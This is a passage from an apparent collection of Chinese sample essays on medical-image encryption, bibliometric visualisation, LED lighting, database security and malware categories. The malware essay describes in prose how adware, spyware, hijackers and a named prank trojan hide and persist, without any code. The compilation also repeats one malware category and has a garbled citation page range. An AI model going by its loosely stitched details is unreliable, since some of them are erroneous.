基本思想是通過混沌系統運算出一個混沌序列,將這個序列按照事先選取的既定的算法或是排列方案進而進一步進行運算以生成新的一個序列。與此同時,為了保證原混沌序列的位置與計算后的新序列之間的變換位置是一一對應的,又進一步利用了混沌系統的遍歷性。實驗表明,這種通過由混沌系統得出的混沌序列的進而對其進一步運算得到的變化關系在應用到圖像置亂后可以實現明顯的圖像置亂效果。同時為了改變加密圖像的統計特性、圖像像素值以及降低圖像像素值間的相關性,也可以通過單個混沌序列或多個復合的混沌序列來實現改變。數字圖像信息隱藏數字圖像信息隱藏技術也可用于保護病人醫學影像的隱私。基本思想是,將需要被加密的醫學圖像的數字信息隱藏在另外一幅無關的圖像中,比如一幅公開圖像。這幅圖像要求具有一定的迷惑性、大眾性,以便迷惑攻擊者,能夠降低轉移其注意力,這樣就降低了圖像被攻擊的幾率;與此同時,通過一定算法改變加密圖像的原有的統計特性。以達到保護被加密影像的目的。應用其中的調配融合算法、“中國拼圖”算法可以使圖像的信息隱藏達到一個高質量的水平。另外,還可以綜合各種不同的算法的特點,將數字隱藏技術擴展到聲音、圖像等不同的信息載體中的信息隱藏需求中去。另外,近年來新興的一種數字作品版權保護技術——數字圖像水印技術[3],能夠有效地保護作者以及出版商的合法權益不受侵犯,現已被廣泛應用于印刷領域中,具有了廣闊的使用價值和商用價值,成為多媒體及知識產權保護的有效手段之一。數字圖像水印技術是信息隱藏技術研究領域的一個重要分支。為了顯示創作者對其作品的所有權,這種隱藏技術將具有某種意義的數字水印利用數字嵌入方法將其隱藏在其作品(可以是多種信息載體,比如視頻、圖像、聲音、文字等數字產品)中。在進行印刷品真偽驗證時,可通過水印的檢測、分析來保證數字信息的完整性及可靠性。數字圖像分存數字圖像分存技術是把一幅需要進行保護的數字圖像分割成多幅圖像進行傳輸。被分割后的圖像不再具有某種特殊的意義成為無意義或是看起來雜亂無章的圖像。也可將分割后圖像進一步隱藏到另外幾幅不相關的或是具有一定迷惑作用的圖像中進行存儲獲傳輸。這類似于數據組的分包傳輸。這樣可以避免因個別圖像的傳輸丟失而造成病人隱私信息遭到泄露的危險,而且也起到在通信中個別被分割后的圖像信息的丟失與泄露不會影響原始圖像信息的泄露。數字圖像分存技術的特點使竊密者竊取完整的原始圖像的成本大大增加,而且也提高了病人圖像隱私的保密程度同時,若將圖像置亂技術、圖像隱藏技術、圖像分存技術三者結合起來將使圖像的安全傳輸有了較高的可靠性。
對病人實行連續診斷,及時獲取病情發展狀況成為未來要實現的目標;同時,病人的隱私在圖像傳輸過程中也增加了泄露和被攻擊的風險,因此,在某種特定情況下對病人圖像信息的傳輸需要進行加密保護。實現這一目標的關鍵技術就是安全性高、保密性強、延時短的圖像加密通信系統。圖像加密通信系統對病人的病情進行實時監護,并將病人的信息實時傳回到醫生的監控中心,使醫生能夠通過監控屏幕實時查看了解病人的具體情況,以能夠及時做出正確的醫療診斷。目前數字圖像的特點決定了其在存儲傳輸時必定要占用較大的空間與帶寬,再加上其需要處理的信息量大,這就進一步給圖像的加密和通信帶來了困難。而遠程醫療更需要清楚的觀測到病人的詳細病情,就進一步加大了保密通信的難度。因此需要將圖像壓縮以及圖像加密兩個技術結合起來對數字圖像的傳輸進行處理。圖像加密是為了保證數字圖像的安全,圖像的壓縮技術可以最大限度的減小占用的存儲空間以便降低傳輸數據量。根據對原始圖像進行壓縮及加密處理過程不同,可將現有的數字圖像加密通信分為三類。圖像直接加密將數字圖像直接加密一般是通過數字圖像置亂技術直接對需要加密的數字圖像進行置亂,隨后再進行壓縮編碼和通信傳輸。這個方面的研究較早,相關論文也最多。例如,基于混沌的數據塊加密算法將圖像或視頻數據先進行位置置亂,再進行像素值擴散,此算法具有較高的密鑰敏感性和明文敏感性,使得加密后的數據具有均勻隨機分布的特點。但是,這類方案只看重了圖像的加密,沒有將圖像的壓縮編碼問題放在同樣重要的位置上考慮。這樣就隨之而然的出現了兩個嚴重影響通信效率及解密后的圖像清晰度的問題。一是,需要加密的原始視頻圖像本身的數據占用空間就大,其進一步的加密計算便會消耗大量的資源與時間,這與實時性的要求有悖,況且目前的設備處理能力有限更難以達到圖像傳輸的實時性要求,加重了通信的負擔;二是,由于經過加密算法處理,使圖像原來的相鄰像素間的相關性有了變化,大量的增加了高頻分量。使加密壓縮后的視頻圖像的高頻分量比低頻分量的失真大得多,因此解密后的圖像會有較大的失真。
首先通過現有的壓縮算法對視頻、圖像進行壓縮,之后再對壓縮后的數據加密。加密的算法可更具需要采用安全性不同的算法。此方案的優點是具有較高的安全性;缺點是由于加密是在壓縮后的數字圖像數據上進行,便不再區分數據的重要性,因此數據加密的效果差、效率低而且數據也量大,使運算的設備負擔也加重。選擇性加選擇性加密是在方案特點的基礎上改進,在選擇采用一定的壓縮標準將視頻圖像壓縮后,再對重要的數據進行著重加密。兼顧了數據的安全與傳輸的效率。目前,視頻圖像編碼標準根據靜態圖像和動態圖像來分主要分為靜態圖像的壓縮標準和運動圖像的壓縮標準兩種。動態圖像的壓縮標準主要有MPEG-1,MPEG-2,MPEG-4,H.263和H.264;靜態圖像的壓縮標準主要有JPEG、JPEG2000。文獻[4]采用小波置亂的方法來實現對JPEG2000的小波系數的實時加密。針對MPEG-2標準,文獻[5]提出了對I幀加密的思路。針對H.264具有代表性的研究成果有Ahn提出的幀內預測模式加擾方法,該方法將所有I、P幀中的INTRA-4x4塊和INTR_16×16塊預測模式使用定長偽隨機序列進行隨機加擾,方法效率高但安全性較差。文獻[6]提出了對熵編碼過程進行加密的思路,但這種方案的實現比較復雜。
作者:李穎姝 李瑩 單位:青島市第五人民醫院 青島市電子政務與信息資源管理辦公室
篇10
信息可視化(informaiton visualization,InfoVis或Iv)是近年來出現的數據挖掘方法之一,它能很好地利用人類對可視化形式下的模型和結構的獲取能力,解決科技文獻數據量過大、無法快速和有效交流的問題,同時可視化數據挖掘可觀察、篩選、發現和理解信息,發現隱藏在數據和信息背后的含意[1]。
本文以開展基礎研究為主,有重點地開展國家急需的、有重大戰略需求的高技術創新研究,并與高新技術應用和轉化工作相協調發展的多學科、綜合性研究所――中國科學院化學所(以下簡稱化學所)作為研究機構的實例,以化學所近5年(2004-2008年)被科學引文索引數據庫(SCIE)收錄的國際論文為科研產出指標,利用SCIE分析功能,結合近年出現的信息可視化數據挖掘軟件――citespace,對收錄的科學文獻全紀錄數據進行統計和可視化分析。在傳統的對相關信息文獻計量分析的基礎上,更加注重利用citespace軟件對論文題目、摘要、關鍵詞、標示符等數據提取詞集,從引文數量、共現和共引的頻次多方面進行聚類計算,發現隱藏在可視化數據背后的有價值情報。
1 方法與數據源
1.1 方法
采用美國Drexe1大學陳超美博士開發的基于JAVA平臺的citespace在線可視化軟件,該軟件是一種適于多元、分時、動態的復雜網絡分析的新一代信息可視化技術。使用citespace 的一般步驟:①確定一個研究領域或研究機構,收集盡可能多的文獻;②收集數據, 包括題目、摘要、被引文獻等信息的文獻全紀錄信息;③參數選擇:確定總的時間段范圍和時間分區;選擇分析的節點類型;引文數量、共被引頻次和共被引系數三個層次上分別設定閾值;選擇算法精簡和合并網絡;④顯示可視化圖譜;確定關鍵點。
citespace可用于進行科學文獻全記錄數據共引網絡分析,通過對文獻信息的可視化,能夠較為直觀地識別研究機構科研產出發展態勢的情報[2]。
1.2 數據源
選擇美國科學情報研究所ISI(International for Scientific Information)創建的SCIE數據庫為數據源,檢索策略為:地址= inst chem* same (chin* aca* or acta*) same beijing),出版年=2004-2008,檢索結果命中記錄4 065條,引文數據138 586條,總被因頻次為38 053次。將2004-2008年間化學所發表的4 065篇論文的作者、題目、主題詞、關鍵詞、文獻的引文等全紀錄信息導入citeSpace軟件,采用SCIE的分析功能和citespace軟件 ( 2009年3月20日2.2. R1 Webstart版本[3])進行年代分布、合作者、學科領域、合作機構、合作國家、期刊共引、作者共引信息分析,繪制網絡可視化圖譜。
2 化學所情況分析
2.1 年代分布
SCIE收錄的2004-2008年間化學所的數量和論文被引頻次分布結果如圖1所示:
在2004-2008年5年間,化學所論文數量保持平穩增長,年均數量約800篇;但是5年間的被引頻次從2004年的186次,猛增到2008年的12 805次,呈逐年大幅度增長的趨勢,被引頻次的提高表明化學所的質量有了顯著的提高。通過SCIE引證檢索結果的數據:化學所論文年平均被引頻次達到6 604.67,篇平均被引頻次為9.36,h指數為66,進一步反映化學所2004-008年5年在國際科學研究領域的影響力顯著加強。
2.2 化學所論文合著者分布(co-authors network)
利用citespace軟件對2004-2008年間化學所的合著者網絡圖譜進行分析,選擇使用關鍵路徑(pathfinder)算法,網絡節點確定為作者,時間區選擇為1年,閾值為(6,6,40),(8,8,40),(10,10,40)。圖譜中不同大小和不同顏色的圓環組成的作者年輪來表示合著者頻次(freq)和合著年份[4]。如圖2、表1所示:
從圖2、表1中可以清晰地看出,2004-2008年化學所的論文合著者中合著頻次高于100次的有7人,其中,合著頻次位于前5位的分別是:Zhu DB院士、Jiang L研究員、Han BX研究員、Liu YQ研究員和Li YL研究員。對論文合著者進行聚類分析,可以看出圖譜可以聚為6大類,6大類中合著頻次最高的作者分別是由Zhu DB院士、Jiang L研究員、Han BX研究員、Wan LJ所長、Wan LJ研究員和Li YF研究員,因此通過化學所論文合著者的網絡圖譜分析,可以清楚地了解化學所研究領域的學科帶頭人及其研究團隊的分布。
2.3 化學所論文學科領域分布(co-occurring subject category )
利用citespace軟件對1995-2008年化學所共現學科領域進行分析,選擇使用關鍵路徑算法,網絡節點確定為學科領域,時間區選擇為1年,閾值為(2,2,5),(3,3,5),(3,3,20)。圖譜中不同大小和不同顏色的圓環組成的學科領域年輪表示學科領域的共現頻次和共現年份,用不同顏色的連線來表示學科領域間共現的年代。如圖3、表2所示:
從圖3、表2中可以看出,在化學所論文共現學科領域中,共現頻次大于20次的學科領域有16個,其中化學、聚合物科學、物理、材料科學、納米科學及納米技術位于與化學所共現學科領域的前5位。
2.4 與化學所共作者的機構分布(network of co-authors institutes)
利用citespace軟件對2004-2008年與化學所共作者的機構網絡圖譜進行分析,選擇使用關鍵路徑算法,網絡節點確定為機構,時間區選擇為1年,閾值為(2,2,5),(3,3,5),(3,3,20)。圖譜中不同大小和不同顏色的圓環組成的機構年輪來表示機構與化學所共作者頻次和共作者年份。如圖4、表3所示:
從圖4、表3中可以看出,在與化學所共作者的機構中,中科院的節點(freq=3 718)遠遠大于其他機構,說明化學所與中科院內的共作者者頻次最高。還可以看出共作者頻次大于30次的機構有14個,其中北京大學、武漢大學、山東大學、清華大學、吉林大學位于與化學所國內共作者的前5位,值得注意的是德國Max Planck Inst Colloids & Interfaces的合作位居第10位,說明化學所與該機構的合作十分緊密。
2.5 與化學所共作者的國家分布(network of co-authors countries)
利用citespace軟件對2004-2008年與化學所共作者的國家網絡圖譜進行分析,選擇使用關鍵路徑算法,網絡節點確定為國家,時間區選擇為1年,閾值為(2,2,3),(2,2,3),(3,3,5)。圖譜中不同大小和不同顏色的圓環組成的國家年輪來表示國家與化學所的共作者頻次和共作者年份。如圖5、表4所示:
從圖5、表4中可以看出,在與化學所共作者的國家中,中國的節點(freq=3 931)遠遠大于其他國家,說明化學所與國內共作者的頻次最高。還可以看出與化學所共作者的頻次大于10次的國家有9個,其中美國、德國、日本、加拿大、英國位于與化學所合作的前5位。
2.6化學所期刊共引分析(journal co-citation network)
利用citespace軟件對2004-2008年化學所期刊共引進行分析,選擇使用關鍵路徑算法,網絡節點確定為期刊,時間區選擇為1年,閾值為(30,30,30),(30,30,30),(30,30,40)。圖譜中不同大小和不同顏色的圓環組成的期刊年輪來表示期刊的共引頻次和共引年份,用不同顏色的連線來表示期刊間共引的年代。如圖6、表5和表6所示:
從圖6、表5、表6中可以清晰地看出,目前化學所使用的核心期刊中有9種期刊的共引頻次高于1 000,其中,期刊共引頻次位于前5位的分別是:《科學》、《自然》、《物理化學雜志B》、《先進材料》、《化學評論》。尤其值得注意的是SCIE數據庫中化學所發文量位于前5位的期刊分別是:《物理化學雜志B》、《應用聚合物科學》、《聚合物》、《大分子》、《蘭格繆爾》,與期刊共引頻次排在前5位的有所不同,因此,在關注學科領域核心期刊的時候,來源期刊發文量和共引頻次排名居前列的期刊都應該是重點關注的期刊。通過化學所期刊共引網絡圖譜中期刊共引頻次的分析,能夠更快速、直觀地了解化學所的核心期刊分布。
2.7 共詞分析(network of co-occuring phrases)
利用citespace軟件對2004-2008年化學所文獻共詞和突現詞進行分析,選擇使用關鍵路徑算法,網絡節點確定為關鍵詞,時間區選擇為1年,閾值為(10,10,20),(10,10,20),(10,10,20)。圖譜中不同大小和不同顏色的圓環組成的年輪來表示關鍵詞的共現頻次和共現年份,用不同顏色的連線來表示關鍵詞間共現的年代。最外層紫色圈突出顯示表示共詞中心性(centrality),即在整體網絡中所起連接作用大小。軟件還會根據某段時間內關鍵詞共現頻次,將變化率高的詞從大量的主題詞中探測出來,稱為突現詞,用紅色字顯示。如圖7、表7所示:
從圖7、表7中可以清晰地看出,化學所論文共現詞,頻次高于100的關鍵詞有21個,其中被引頻次位于前5位的分別是:聚合物(polymers)、形態學(morphology)、納米粒子(nanoparticles)、膜(films)和衍生物(derivatives)。通過高頻出現的關鍵詞在共詞網絡圖譜中展示的共現頻次,在一定程度上揭示了化學所的熱點研究方向。
3 小 結
本文通過繪制化學所的合作者、學科領域、合作機構、合作國家、期刊共引和文獻共詞的可視化圖譜,以圖譜方式揭示了化學所近5年發展過程中起關鍵作用的學科帶頭人、重點學科、核心期刊、研究熱點等信息情報。目的在于通過研究機構文獻計量的可視化分析方法,探索深度挖掘研究機構內部的重點學科領域分布、合作團隊及學科領軍人物、研究機構外部的合作研究機構及合作國家的分布以及研究機構的熱點研究方向等情報的方法,在滿足科研用戶學術信息查找利用需求的同時,為研究所制定戰略規劃、提升國際競爭能力提供有價值的情報,從而進一步提升學科館員融入研究所科研一線的知識化服務能力。
參考文獻:
[1] Chaomei C.Searching for intellectual turning points:Progressive knowledge domain visualization.Proceedings of the National Academy of Sciences of the United States of America,Washington:US National Academy of Sciences,2004,101(Supp1.1):5303-5301.
[2] 劉則淵. 科學知識圖譜:方法與應用. 北京:人民出版社,2008.
篇11
一、LED光源、燈具的優點及靈活性
(一)LED光源概述
LED,即半導體發光二級管,其單位體積小,在顯示屏、交通訊號顯示、汽車工業、建筑行業等方面獲得廣泛應用。LED光源在應用中,其功能性較強,發光效率高,光線質量強,且LED光源光色純,光束集中,響應快,其藝術性較強;LED光源多采取低電壓低電流驅動,功率因數接近1,耗能低,可以有效節約能源;LED光源內不含有有毒成分,廢棄物可以有效回收利用,屬于一種無污染光源,綠色環保,是21世紀必不可少的環保照明用品。一般低功率白光LED壽命在3萬小時以上,高功率白光LED壽命在2萬小時以上,彩色LED壽命則在5-10萬小時范圍內,其壽命長。綜上,LED光源相對傳統燈性能而言,其符合綠色環保要求,綜合性能較好,具有較強的競爭優勢。
(二)LED燈的“隱蔽”性
LED光源其單位體積較小,結構設計緊湊,應用方式靈活,能夠在狹小空間范圍內投光,便于隱藏,也可以組合應用多顆粒LED光源構成光源線或面或其他造型,美化景觀及建筑環境,提高其藝術效果。LED燈的“隱藏”主要分為點式隱藏、帶式隱藏與面式隱藏三種形式。其中點式隱藏為:于天棚設置燈槽并安裝單個燈具,根據實際需要,選擇多顆LED組合為大功率光源;帶式隱藏:于天棚四周設置燈槽并安裝LED條形射燈,通過多顆彩燈LED光源構成一列或多列,采取串聯方式進行設置,由上而下照明;面式隱藏:一般建筑中,天棚、外墻面及地板為主要照亮發光面,應用LED光源,于窗戶內沿或支架上設置線性發光條,營造出良好的裝飾效果。
(三)LED燈與建筑一體化
在現代建筑照明設計中應用LED,可以實現建筑與照明一體化,要求協調建筑空間、建筑構件與燈具等因素,合理協調組織,相互促進,應用科學措施解決存在問題。LED燈與建筑一體化中,其中大面積顯示屏應用效果尤為突出。當前,LED形狀大多表現為圓形,其呈現外觀多為圓形排列構成,與外包殼結合形成視覺造型。LED燈與建筑構件相結合,在照明設計中應綜合考慮燈具與建筑構件和諧性與藝術性。LED燈本身存在著裝飾性,可以在中空管線中形成線性發光條或發光帶,在建筑立面構件中設置于夜景裝飾部位,從而形成與建筑為一體的線性發光條。
二、LED照明在多設計領域中的應用
(一)LED室內照明設計
建筑室內環境照明應綜合考慮設計目標,合理應用技術措施及藝術手段,對室內設計環境及空間等因素進行充分分析,應用創造性思維,打造出符合工作、生活、生產功能需求,滿足人們心理及生理要求的室內照明環境。在建筑室內進行照明設計時,應遵循以下原則:從視角角度,要求室內照明設計可見度較好,保證其照度合適,亮度分布均勻,避免出現眩光;從心理角度,要求室內照明設計氛圍符合環境功能要求。
(二)LED室外照明設計
室外照明在提高城市活力,保障夜間車輛通行安全及效率,保障行人安全等方面發揮著重要的現實意義,室外照明延展了人們的夜間生活時光,豐富了城市居民休閑及娛樂活動。建筑室外照明設計,是通過燈光照明塑造景觀效果。人們對建筑室外照明需求可以分為基本需求、感官信息需求及精神審美需求三個方面,按照人們的需求不同,可以將室外照明劃分為安全照明、功能照明與景觀照明三種類型。其中安全照明與功能照明屬于基礎性照明,景觀照明側重滿足人們的精神需求,給人帶來精神上的享受。
1.道路照明設計中LED的應用
進行道路照明設計,其目的主要在于:保障車輛行駛安全;方便行人辨別方向、識別障礙物,提供安全感;改善夜間環境。道路照明設計為夜間車輛及人員提供安全舒適的光環境。考慮到道路照明持續性及其能源消耗較大,為此,在道路照明設計中應用LED,可以有效節約能源,保護環境,提高城市形象。城市道路照明規劃設計應建立于城市發展規劃的基礎上,并綜合考慮電力規范,保障道路設計的科學合理性,能夠有效的減少資源浪費。
LED城市道路照明設計主要內容為:按照道路級別、交通密度、交通控制措施、城市規模及是否為旅游城市等合理選擇照明標準值;在道路照明設計中考慮誘導性因素,如道路燈桿、燈具、中心線等屬于視覺誘導性因素,照明燈光、光源色及排列等為光學誘導性因素,確保道路照明設計其誘導性良好;為駕駛人員提供良好的視覺舒適感與可見度;安好道路級別與道路周邊環境合理選擇光源。
2.建筑外觀照明設計中LED應用
建筑外觀照明屬于城市規劃與城市建設的重要部分,其照亮建筑物的方式主要分為泛光照明與內透光照明兩種方式。其中LED泛光照明即立面照明,屬于一種應用較為廣泛的建筑外部裝飾照明方式,如國際著名景點埃菲爾鐵塔、巴黎圣母院、凱旋門等建筑均采取泛光照明方式。LED投光燈光色好,立體性較強,其藝術效果較明顯。LED透射式照明,以其功能特點為標準可以分為裝飾性透射與功能性透射兩種形式。上海金茂大廈就是采取內透照明方式,讓整個建筑通透,提高了建筑外觀效果,且便于維修,綜合效益良好。
3.景觀照明設計中LED應用
景觀照明結合了自然及美學,是對夜間景觀環境的二次藝術性創造,可以營造出抒情的生活環境,改善人們生活質量。LED光源其柔和光色在景觀照明設計應用中藝術效果十分突出,不僅可以為人們提供良好的視覺環境,還可以有效協調光色,增強景觀藝術美感,陶冶情操,滿足人們審美需求、心理需求。如在庭院燈光小品中應用LED,采取柔和的顏色,產生視覺享受,豐富情感。
三、結語
LED光源單位體積小,功能性、藝術性,且綠色節能,因其有突出的特性,在照明市場中占有重要地位,逐漸在各領域得到廣泛應用。在現代照明設計中應用LED,其綜合效益突出。本文在概述LED光源的基礎上,重點對LED在照明設計中的應用進行研究。LED在照明設計中分為點式隱藏、帶式隱藏與面式隱藏三種隱藏方式,將LED燈與建筑一體化,能夠有效提高照明效果,并從室內與室外兩個角度,對LED在現代建筑設計中的應用進行分析。實踐證明,LED光源在照明設計中應用效果突出,綜合效益良好,未來應用前景廣闊。
參考文獻:
[1]袁景玉,唐春娥.建筑化LED照明設計流程與策略分析[J].城市建設理論研究(電子版),2011,(34).
[2]李玲英.淺談發光二極管在建筑照明設計中的應用[J].城市建設,2010,(27):113-114.
[3]葉威.論大功率LED照明設計工作的技術要點[J].商品與質量?建筑與發展,2013,(7):464-464.
篇12
在應用數據庫時,有一個驗證程序,針對全部用戶,即鑒別使用用戶的身份。在端口計算機和訪問計算機的身份鑒別中要使用身份鑒別。當我們想要使用計算機時,用戶需要連接相應的HTTP和SSH,輸入用戶名和密碼,來鑒別用戶的身份。使用的人需要嚴格保守密碼,同時存留在對應的服務器上。將編程技術運用到計算機數據的使用和建立中,能夠實現企業關聯數據和內部文件的安全管理,以免由于企業信息泄露,給企業造成經濟損失。
(二)可用性
將編程技術運用到數據庫系統中,其可用性十分強。成功解決不均衡的負載和一些數據庫中的故障等問題是對可用性的要求。當計算機的主接口出現了問題,留作備用的接口將會自動替代問題接口進行工作,這樣可以使其他故障不對其產生作用,保證網絡在工作過程中的持續穩定性。另外,接收大量的網絡數據時,主接口就可以在備用接口的幫助下,完成數據的接收和傳輸工作,確保計算機能夠正常運作。
(三)隱藏信息的特性
在進行通訊連接時,由于計算機中NAT技術的作用,內部網絡中的網址會被隱藏,此時顯示在數據中的結果是通過公共網絡網址進行訪問的,這就是編程技術的隱藏性。換句話說,企業的平常管理工作中,用戶可以使用計算機直接訪問外部網絡,然而對企業內部網絡的搜索和查看,這些是外部網絡無法實現的,成功實現了安全管理及保密企業信息。
二、計算機軟件工程的數據庫編程技術
(一)設計、開發編程技術
數據庫正式投入使用后,需要隨時關注系統的運作情況,在系統運行的過程中,盡早發現沒有處理的問題并進行分析。所以,就要折返到編程階段,盡早處理在編程階段沒有處理的問題,完善優化數據存儲系統。與此同時,運用不同的編程技術來應對不同的軟件應用,根據各種軟件應用的不同特性,采取不一樣的編程技術,對軟件運用中有待處理的問題進行分析,保證軟件可以平穩的運作,而且還能夠合理化的運用系統資源,假若一部分數據出現傳輸問題,也能夠運用編程技術將出現問題的部分進行調整。
(二)加密數據庫文件
當今社會,信息化高速發展,在聊天記錄、網絡搜索中都存在大量的個人隱私,人們對個人隱私的重視度也逐漸提高,而計算機數據庫作為專門存儲網絡信息的工具,其保密性能的高低,直接關系到人們生活、工作中的信息安全問題。一方面,要分析數據庫中存儲的基本信息,并加上基本的保護在其中的隱私類消息上,一旦有信息外漏的情況產生,編程師就要及時通過編程的方式處理這個問題,經過編程,加密保護數據庫中的文件。在實行加密保護的同時,還要與計算機軟件工程的現實情況進行結合,從而充分發揮加密保護的作用;另一方面,加密保護的功能還可以進一步更深層次的設計,將加密保護分成幾個層級,以滿足不同用戶的要求,同時每個用戶都可以設置自己的專用登錄密碼,然后系統編程會確認登錄密碼的正確與否,并根據對應的密鑰,實現深層次加密信息;最后,在數據庫編程時,由于信息不同的選擇造成各系統間的沖突,能夠運用系統間的優化體系,優化處理產生的問題。
(三)設計存儲模式
如今的生活中,由于計算機的使用越來越普遍,數據庫技術就要保護更多的網絡信息數據。一方面,軟件系統的設計要以軟件功能系統的選取為重點,也可以將其他工程項目設計過程中的理念運用其中,優化設計方案,從而使設計出的數據庫能夠更加穩定的運行;另一方面,在數據庫進行實際存儲時,可以將各類信息進行分類存儲,方便人們二次使用數據。最后,將優化的數據系統運用到數據庫存儲模式中,在數據庫開始使用后,可以將產生的問題盡早優化,同時還能夠將沒有解決的問題盡早發現,以使數據庫的存儲更加方便用戶使用。
三、結語
由此可見,將數據庫編程技術分析工作做好,意義十分重大。這對于計算機數據庫實際應用的提高十分有利,可以擴大編程技術的運用優勢,在國家信息化發展方面,提供更多的技術方面支持。所以,基于計算機軟件工程的數據庫編程技術在今后的計算機研究工作中應予以更多的重視,并科學的評測此類技術的實際運用效果,用以增加適用范圍,使其在國家經濟社會的發展中發揮作用。
軟件工程碩士論文參考文獻:
[1]張學立,田林琳.基于計算機軟件工程的數據庫編程技術淺談[J].時代農機,2018,45(11):163.
篇13
惡意軟件是介于病毒和正規軟件之間的軟件,具備正常功能(下載、媒體播放等)和惡意行為(彈廣告、開后門)等,既有一定的實用價值,也會給用戶帶來種種干擾。這些程序未經用戶許強行潛伏到用戶電腦中,而且此類程序無卸載程序,無法正常卸載和刪除,強行刪除后還會自動生成。此外,像廣告程序會強迫用戶接受閱讀廣告信息,間諜軟件搜集用敏感信息并向外發送,嚴重侵犯了用戶的選擇權和知情權。在最近幾年,產生了以下幾種主要的惡意軟件:
(一)廣告軟件(Adware)
廣告軟件是指未經用戶允許,下載并安裝在用戶電腦上;或與其他軟件捆綁,通過彈出式廣告等形式牟取商業利益的程序。此類軟件往往會強制安裝并無法卸載;在后臺收集用戶信息牟利,危及用戶隱私;頻繁彈出廣告,消耗系統資源,使其運行變慢等。例如:用戶安裝了某下載軟件后,會一直彈出帶有廣告內容的窗口,干擾正常使用。還有一些軟件安裝后,會在IE瀏覽器的工具欄位置添加與其功能不相干的廣告圖標,普通用戶很難清除。
(二)間諜軟件(Spyware)
間諜軟件是一種能夠在用戶不知情的情況下,在其電腦上安裝后門、收集用戶信息的軟件。用戶的隱私數據和重要信息會被“后門程序”捕獲,并被發送給黑客、商業公司等。這些“后門程序”甚至能使用戶的電腦被遠程操縱,組成龐大的“僵尸網絡”,這是目前網絡安全的重要隱患之一。例如:某些軟件會獲取用戶的軟硬件配置,并發送出去用于商業目的。
(三)瀏覽器劫持
瀏覽器劫持是一種惡意程序,通過瀏覽器插件、BHO(瀏覽器輔助對象)、Winsock LSP等形式對用戶的瀏覽器進行篡改,使用戶的瀏覽器配置不正常,被強行引導到商業網站。用戶在瀏覽網站時會被強行安裝此類插件,普通用戶根本無法將其卸載,被劫持后,用戶只要上網就會被強行引導到其指定的網站,嚴重影響正常上網瀏覽。例如:一些不良站點會頻繁彈出安裝窗口,迫使用戶安裝某瀏覽器插件,甚至根本不征求用戶意見,利用系統漏洞在后臺強制安裝到用戶電腦中。這種插件還采用了不規范的軟件編寫技術(此技術通常被病毒使用)來逃避用戶卸載,往往會造成瀏覽器錯誤、系統異常重啟等。
(四)行為記錄軟件(Track Ware)
行為記錄軟件是指未經用戶許可,竊取并分析用戶隱私數據,記錄用戶電腦使用習慣、網絡瀏覽習慣等個人行為的軟件。危及用戶隱私,可能被黑客利用來進行網絡詐騙。例如:一些軟件會在后臺記錄用戶訪問過的網站并加以分析,有的甚至會發送給專門的商業公司或機構,此類機構會據此窺測用戶的愛好,并進行相應的廣告推廣或商業活動
(五)惡意共享軟件(malicious shareware)
惡意共享軟件是指某些共享軟件為了獲取利益,采用誘騙手段、試用陷阱等方式強迫用戶注冊,或在軟件體內捆綁各類惡意插件,未經允許即將其安裝到用戶機器里。使用“試用陷阱”強迫用戶進行注冊,否則可能會丟失個人資料等數據。軟件集成的插件可能會造成用戶瀏覽器被劫持、隱私被竊取等。例如:用戶安裝某款媒體播放軟件后,會被強迫安裝與播放功能毫不相干的軟件(搜索插件、下載軟件)而不給出明確提示;并且用戶卸載播放器軟件時不會自動卸載這些附加安裝的軟件。
(六)行為記錄軟件(track ware)
行為記錄軟件是指未經用戶許可,竊取并分析用戶隱私數據,記錄用戶電腦使用習慣、網絡瀏覽習慣等個人行為的軟件。行為記錄軟件危及用戶隱私,可能被黑客利用來進行網絡詐騙。例如,一些軟件會在后臺記錄用戶訪問過的網站并加以分析,有的甚至會發送給專門的商業公司或機構,此類機構會據此窺測用戶的愛好,并進行相應的廣告推廣或商業活動。
(七)惡作劇程序
惡作劇程序通常都是執行程序,本身沒有過激危害,但影響正常工作的一類程序。惡作劇程序改變系統中部分文件的編碼格式,運行沒有任何提示,支持文件改名,支持文件合并器。惡作劇程序如果不是刻意散播,通常沒有自我散播能力。例如,“涂改者234496”(Win32.Troj.Hider.i.234496)
這是一個惡作劇程序,復制自身到系統目錄,設置自身為系統隱藏文件,并通過添加到系統服務方式隨系統啟動。該程序會修改系統文件夾選項中的“顯示隱藏文件”部分來保護自身,并且修改exe文件的關聯方式。
歸納起來,惡意軟件有兩大特點:一是編寫病毒化。不少惡意軟件為了防止被殺毒軟件或惡意軟件卸載工具發現,采用了病毒常用的Rootkit技術進行自我保護。Rootkit可以對自身及指定的文件進行隱藏或鎖定,防止被發現和刪除。更有一些惡意軟件,采用“自殺式”技術攻擊殺毒軟件。一旦發現用戶安裝或運行殺毒軟件,便運行惡意代碼,直接造成計算機死機、藍屏,讓用戶誤以為是殺毒軟件存在問題。二是傳播病毒化。為了達到更好的傳播效果,并減小成本,不少中小廠商直接使用病毒進行“惡意推廣”。用戶的計算機感染病毒后,病毒會自動在后臺運行,下載并安裝惡意軟件。同時,惡意軟件安裝后也會去從互聯網自動下載運行病毒。大量的惡意軟件開始使用電腦病毒來隱藏自身、進行快速傳播、并對抗用戶的清除等,這些行為嚴重危害到用戶的信息安全和利益。惡意軟件和病毒之間的界限已變得越來越模糊。隨著惡意軟件不斷朝著病毒的方向發展,要想徹底殺滅惡意軟件就必須采用反病毒技術。
二、惡意軟件的技術分析
長期以來,人們設計計算機的目標主要是追求信息處理功能的提高和生產成本的降低,而對于安全問題則重視不夠。計算機系統的各個組成部分,接口界面,各個層次的相互轉換,都存在著不少漏洞和薄弱環節。硬件設計缺乏整體安全性考慮,軟件方面也更易存在隱患和潛在威脅。對計算機系統的測試,目前尚缺乏自動化檢測工具和系統軟件的完整檢驗手段,計算機系統的脆弱性,為惡意軟件的產生和傳播提供了可乘之機;全球萬維網(www)使“地球一村化”,為惡意軟件創造了實施的空間;新的計算機技術在電子系統中不斷應用,為惡意軟件的實現提供了客觀條件。實施惡意軟件入侵的技術是五花八門,用好了可以伸張正義,用歪了卻成為罪惡的幫兇。
(一)隱藏技術
